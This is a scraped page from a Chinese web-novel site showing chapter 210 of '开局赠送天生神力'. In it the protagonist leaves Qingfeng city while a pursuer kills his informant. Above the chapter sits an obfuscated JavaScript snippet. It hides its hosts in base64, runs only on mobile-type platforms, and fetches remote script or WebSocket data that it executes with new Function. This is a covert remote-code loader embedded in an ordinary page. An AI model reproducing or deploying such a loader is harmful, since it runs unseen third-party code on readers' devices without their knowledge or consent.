笔趣阁

字:
关灯 护眼
笔趣阁 > 开局赠送天生神力 > 第二百一十章 来人
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第二百一十章 来人

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
艳阳高照,雪比往常要小不少了,毕竟立春将至,万物开始复苏,就连老树也抽发着新芽,生机勃勃。
  
  只不过依旧还倒着春寒,反倒比以前还要冷了。
  
  此时官道之上。
  
  踏踏踏,响亮的马蹄声在如击鼓般作响,三四架马车组成的车队,踩着风疾驰。
  
  林末此时坐在最前面的马车之上,赶车的则是芦子重。
  
  比起其余以毒网收编的游侠儿,这人最是驯良,很是乖巧,并没有让林末烦过心。
  
  在前面几天,林君阳等人先一步撤离后,更是主管起府上事务,将一切安排得极为妥当,很是好用。
  
  而后面两人交谈,林末无意得知,其还中过举,尤为博闻强识后,便索性将其提了个等级,当了个头头。
  
  林末坐的位置在马车车厢中部,这个位置最为开阔,能将前面的情况一览无余,遇见什么情况也好反应。
  
  车轮碾在道路上,咕噜声起,不时夹杂着石子翻飞的杂响,以及黑毛马的粗重的响鼻。
  
  他略微回头,看了眼已经只剩一个小黑点的庆丰城,摇了摇头。
  
  此间事了,或许再也不会踏足这个城市了。
  
  不过总的来说,此行事事都算有着落,不算白来。
  
  甚至最后,连那瘟疫的实质也搞清楚了。
  
  在一次林末与鱼玄机闲谈中,想法得到印证。
  
  果然这被记入卷宗称为‘鬼瘟’的疫病,并不是什么蛊虫瘟秽之类引起,而是人为气场异变导致,这也是为何林末使用毒仙注,想要炼化出瘟秽而失败的原因。
  
  据他从鱼玄机处所知,武道修炼到高深之处,武夫单凭磅礴的气血以及旺盛的气机,即使站立不动,也能影响天地。
  
  强横者,甚至全力施为,光是强大的气场便能勾连天地,引发雷劫之类的。
  
  而此次庆丰瘟疫,便是由某件物,或许某个人,生命气场太过强盛,强横的意志影响普通人身体机能,以之生命为代价,进行肌肉分裂,骨骼硬化等等。
  
  至于为何会消失,两人推测那便是寒潭异象出现的原因。
  
  一位不知名的高手,直接将那件物或人给击溃了?
  
  不得而知。
  
  但,单是气场便足以影响一县之地,缔造出如此大的灾难,足以令人心惊。
  
  林末伸出手,拳头虚握,好似将什么东西抓在手中。
  
  ‘这就是乱世,若是实力不够,或许连死了,都不知道杀人者是谁,不得不说很是悲哀。’
  
  他最初的梦想是好好的活着,现在梦想是活得好好的,从未改变。
  
  可惜,在这没有法制,个人武力横行的世界,诸事必不能如人所愿。
  
  地球时的一句话说的很好,手里有剑,和有剑不用,是两码事,无论如何,力量只有握在手中方是真。
  
  “大人,前方将要进槐回山了。”正在赶车的芦子重轻声提醒道。
  
  山中有毒瘴,若是不稍加注意,即使立命在身的武夫,身陷瘴中,久久不得出,也会有性命之危。
  
  “把装备戴好,多检查一下黑毛马的马罩,别在林中马给毒死了,后段路还难熬。”林末淡淡道。
  
  “是!”
  
  官道上,马车速度稍慢,踩着斑驳的碎影,驶进密林之中。
  
  无人注意,官道之后,一条赤色细犬独占整条道。
  
  其耳朵低垂,鼻与脑袋呈直线型,舌头一直暴露在空气中,走走停停,随后一路沿着官道狂奔。
  
  细犬之后,则是两匹通体漆黑,耳朵带毛的高头大马。
  
  大马也很特殊,鼻子不是马鼻,而是熊鼻,没错,这也是黑毛马,由黑眼熊与烈马杂交而出,耐力跑力俱是绝佳。
  
  而比起林末等人的黑毛马,这两匹马无论是肌肉轮廓,还是毛发光泽,奔袭速度都要略胜一筹,明显是马王之流。
  
  “大人,我该做的都已经做了,您能放我一条生路吗?我上有老下有小,可真死不得啊!”
  
  黑毛马之上,一个面容俊朗的男子,看见前方的细犬停顿次数越来越少,速度也越来越快,不由苦着脸,转头看向身旁的绿衫老者,求饶道。
  
  他名杨群,杨氏族人,地位还不低,毕竟作为立命高手,已经算族里中坚往上靠的人物,即使在庆丰城,逢人也被人叫为杨二爷。
  
  谁也想不到,自视风流无比,庆丰最得意的杨二爷,此时会卑微到如此地步。
  
  “你是知道的,在未找到人前,我不会放你走,而同样,找到人,也绝不将你拘留。”古一通视线一直盯着前方,从未离开,轻声说道。
  
  熟悉的人知道,古一通表情越是平淡,越是代表着他处于愤怒的边缘。
  
  他没办法不忿恨,不仅是恨那林君末,更是恨古重文。
  
  为什么一个乡下家族之人,敢与他们金沙郡古氏放对?
  
  而为什么,在族里也狂放不羁的古重文,就在他路过宁阳,与普世教谈些事情的几天时间,在这种小地方,竟然被活生生打死了!
  
  他想到这,目光越是阴沉。
  
  暗骂了一声废物。
  
  “你再重述一遍那林君末的功法特点与底牌,与昨日所言,有一点差池,我不光杀你,还要杀你全家。”绿衫老者面无表情地说道。
  
  杨群呼吸一窒,想着昨夜身前之人的残暴,轻声叹气:
  
  “林君末此人力气极大,最擅长正面对抗,有毒道手段,底牌是......”
  
  片刻后,古一通点点头,与昨晚所言一般无二。
  
  ‘诡异的毒道手段,比古重文还强的巨力横练,还有那秘术手段,确实难缠。’
  
  他心中自语,略微升起了警惕心,脑海里瞬间形成了六七种不同情况下的应对手段以及招法策略。
  
  随后眼神愈加冰冷。
  
  “大人,我其实建议您多带点人手,以围攻为佳,那样更为保险。
  
  若是可以,最好准备大量辟毒物品,随后暗中偷袭,将其重伤后,再以速度击之,必能不费吹灰之力”
  
  杨群小心翼翼地说道,一副站在古一通立场的模样。
  
  绿衫老者有些诧异地看着一脸谄媚的杨群,复杂地叹了声气,“你是个聪明人...”
  
  杨群闻言,小心翼翼地赔笑,没有说话,只是心里有些不安,下一刻,却直接眼前一黑,一股子剧烈的疼痛从腹部传来。
  
  啪!
  
  身躯瞬间一僵,随后从黑毛马之上一下子栽了下来。
  
  “可惜我最讨厌聪明人....”
  
  古一通叹了声气,从怀中取出丝巾,将手上血迹擦拭干净,看了眼远处的密林。
  
  “毒道?巨力?可笑至极!”
  
  他眼中出现一抹厉色,一掌拍在座下大马之上。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师